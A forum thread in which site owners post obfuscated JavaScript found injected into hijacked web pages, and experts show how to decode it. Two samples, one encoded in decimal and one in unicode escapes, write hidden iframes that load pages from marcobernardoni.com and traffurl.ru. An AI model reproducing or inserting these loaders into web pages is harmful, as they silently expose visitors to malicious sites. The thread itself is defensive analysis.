I have no knowledge of programming... I can usually look through a script though and figure out what the idea is.
Recently several of my sites got hijacked and below is the code that was inserted, what I'm trying to do is to decode it to figure out what it's intent was and to see if it opened up any other holes in the server that I need to know about.
Maybe this is easy stuff... but I don't have a clue where to start ... -
<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062'; s+='060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111';s=s+'110105046099111109047120047105110100101120046112104112034032119105100116104061051032104101105103104';s=s+'116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069';s=s+'062032';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script><!-- c4 -->
-
any help would be greatly appreciated.
TIA.
10  12308  pbmods 5,821
Recognized Expert Expert
Heya, KyredBone. Welcome to TSDN!
Have a look at this thread.
Ok... I looked at that and created a test.php on my server... I see the text box but it is empty... I'm guessing I've done something wrong... how much or what portion exactly do I need to put in -
document.getElementById("test").value = unescape('code goes here')
-
and also do I need the " ' " around the code goes here ?
Ok...once I saw you noted that it was obfuscated JS then I did some more research and found the site below that would decode it .... thx. http://www.netdemon.net/haywyre/ acoder 16,027
Recognized Expert Moderator MVP
Ok...once I saw you noted that it was obfuscated JS then I did some more research and found the site below that would decode it .... thx.
http://www.netdemon.net/haywyre/
That thread dealt with a simple escaped string. Yours is a bit more complicated. That's why it wouldn't work.
Can anyone tell me about how to decode this script:
<script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u00 6d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068 \u0074\u0074\u0070\u003a\u002f\u002f\u0074\u0072\u 0061\u0066\u0066\u0075\u0072\u006c\u002e\u0072\u00 75\u002f\u0073\u006c\u0069\u0076\u002f\u0069\u006e \u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u 0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u00 20\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031 \u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u 0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u00 74\u0079\u003a\u0068\u0069\u0064\u0064\u0065\u006e \u003b\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u 006e\u003a\u0061\u0062\u0073\u006f\u006c\u0075\u00 74\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072 \u0061\u006d\u0065\u003e');
</script>
I encountered this on a friends page and removed it. I know it is associated with traffurl.ru. my "noscript" add on for Firefox blocked the site when I went to his web site which was how I figured out it was in his page but I cannot figure out a way to decode it to see what it is doing. Any help?
rnd me 427
Recognized Expert Contributor
[PHP]
<iframe src="http://traffurl.ru/sliv/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
[/PHP]
acoder 16,027
Recognized Expert Moderator MVP
Can anyone tell me about how to decode this script:
You've got the decoded version as posted by rnd me, but if you want to decode it yourself, here's a very easy way: replace the document.write with an alert.
Anyone can help me to decode this scripts? - dw_Inf.gw=dw_Inf.fn("\x77\x69\x6e\x64\x6f\x77\x2e\x6c\x6f\x63\x61\x74\x69\x6f\x6e");dw_Inf.ar=[65,32,108,105,99,101,110,115,101,32,105,115,32,114,101,113,117,105,114,101,100,32,102,111,114,32,97,108,108,32,98,117,116,32,112,101,114,115,111,110,97,108,32,117,115,101,32,111,102,32,116,104,105,115,32,99,111,100,101,46,32,83,101,101,32,84,101,114,109,115,32,111,102,32,85,115,101,32,97,116,32,100,121,110,45,119,101,98,46,99,111,109];
- dw_Inf.mg=dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x67\x65\x74\x28\x64\x77\x5f\x49\x6e\x66\x2e\x61\x72\x29');
- dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x2e\x68\x6f\x73\x74\x6e\x61\x6d\x65');
- dw_Inf.x0=function(){dw_Inf.fn('\x69\x66\x28\x21\x28\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x3d\x22\x22\x7c\x7c\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x3d\x22\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x22\x7c\x7c\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x3d\x22\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x22\x7c\x7c\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x22\x64\x79\x6e\x2d\x77\x65\x62\x2e\x63\x6f\x6d\x22\x29\x21\x3d\x2d\x31\x29\x29\x61\x6c\x65\x72\x74\x28\x64\x77\x5f\x49\x6e\x66\x2e\x6d\x67\x29\x3b');dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x72\x65\x61\x64\x79\x3d\x74\x72\x75\x65\x3b');dw_Inf.fn('\x64\x77\x5f\x73\x63\x72\x6f\x6c\x6c\x65\x72\x73\x2e\x72\x65\x61\x64\x79\x3d\x74\x72\x75\x65\x3b');};
- dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x78\x30\x28\x29\x3b');
Thanks advanced for all helps!!
acoder 16,027
Recognized Expert Moderator MVP
First of all, welcome to Bytes!
What you can do is wrap those statements in strings and use document.write or alert to display. Those code snippets show as: - dw_Inf.gw=dw_Inf.fn("window.location");dw_Inf.ar=[65,32,108,105,99,101,110,115,101,32,105,115,32,114,101,113,117,105,114,101,100,32,102,111,114,32,97,108,108,32,98,117,116,32,112,101,114,115,111,110,97,108,32,117,115,101,32,111,102,32,116,104,105,115,32,99,111,100,101,46,32,83,101,101,32,84,101,114,109,115,32,111,102,32,85,115,101,32,97,116,32,100,121,110,45,119,101,98,46,99,111,109];
-
dw_Inf.mg=dw_Inf.fn('dw_Inf.get(dw_Inf.ar)');
-
dw_Inf.fn('dw_Inf.gw=dw_Inf.gw.hostname');
-
dw_Inf.x0=function(){dw_Inf.fn('if(!(dw_Inf.gw==""||dw_Inf.gw=="127.0.0.1"||dw_Inf.gw=="localhost"||dw_Inf.gw.indexOf("dyn-web.com")!=-1))alert(dw_Inf.mg);');dw_Inf.fn('dw_Inf.ready=true;');dw_Inf.fn('dw_scrollers.ready=true;');};
-
dw_Inf.fn('dw_Inf.x0();');
Hello Guys,
I have solved your problems - i have made a little tool in vb.net to decode and encode again - below you can find the link where u can see the video also how to use it.
adeelnokiastuffs.blogspot.com/2010/08/javascript-hexa-codes-decoder-and.html
if anything please email me at adeel.rizvi at yda.net.au
Sign in to post your reply or Sign up for a free account.
Similar topics | |
by: assaf |
last post by:
hi all
i am using PreEmptive Solutions dotfuscator (community edition).
and i am getting 'TypeLoadException' for a simple interface that i defined.
how can i debug an obfuscated application?
...
|
by: Newbie |
last post by:
How would I modify this form
to encode *all* the characters
in the 'source' textarea to the
'%xx' format & place result
code into the 'output' textarea?
(cross browser compatable)
Any help is...
|
by: tgh003 |
last post by:
I would be interested to hear how others are managing their javascript
(.js) files from the original code vs the obfuscated version they
publish to their site/webapp.
I currently manage 2 files,...
|
by: Asha |
last post by:
greetings, attach below are javascripts, if you notice there is a keyword called escape which encodes the entire file and pass onto another fill to be decoded.
here are my implementation for...
|
by: kpmassey |
last post by:
I am trying to use wget to retrieve web pages like this:
http://www.michigan-football.com/s/2006/cascades.htm
Visit it and view source to see the obfuscated javascript.
Is there any tool to...
| | |
by: kebal |
last post by:
hy friends.. please decode this script.
<script language="JavaScript"> ...
|
by: sureshl |
last post by:
JavaScript Experts,
I have the following HTML. How could I use JavaScript such that when a user clicks on the checkbox in each row the phone numbers and e-mail addresses are partially obfuscated...
|
by: Hystou |
last post by:
There are some requirements for setting up RAID:
1. The motherboard and BIOS support RAID configuration.
2. The motherboard has 2 or more available SATA protocol SSD/HDD slots (including MSATA, M.2...
|
by: marktang |
last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However,...
|
by: jinu1996 |
last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven...
|
by: Hystou |
last post by:
Overview:
Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows...
| | |
by: agi2029 |
last post by:
Let's talk about the concept of autonomous AI software engineers and no-code agents. These AIs are designed to manage the entire lifecycle of a software development project—planning, coding, testing,...
|
by: isladogs |
last post by:
The next Access Europe User Group meeting will be on Wednesday 1 May 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM).
In this session, we are pleased to welcome a new...
|
by: conductexam |
last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and...
|
by: adsilva |
last post by:
A Windows Forms form does not have the event Unload, like VB6. What one acts like?
|
by: 6302768590 |
last post by:
Hai team
i want code for transfer the data from one system to another through IP address by using C# our system has to for every 5mins then we have to update the data what the data is updated ...
| |
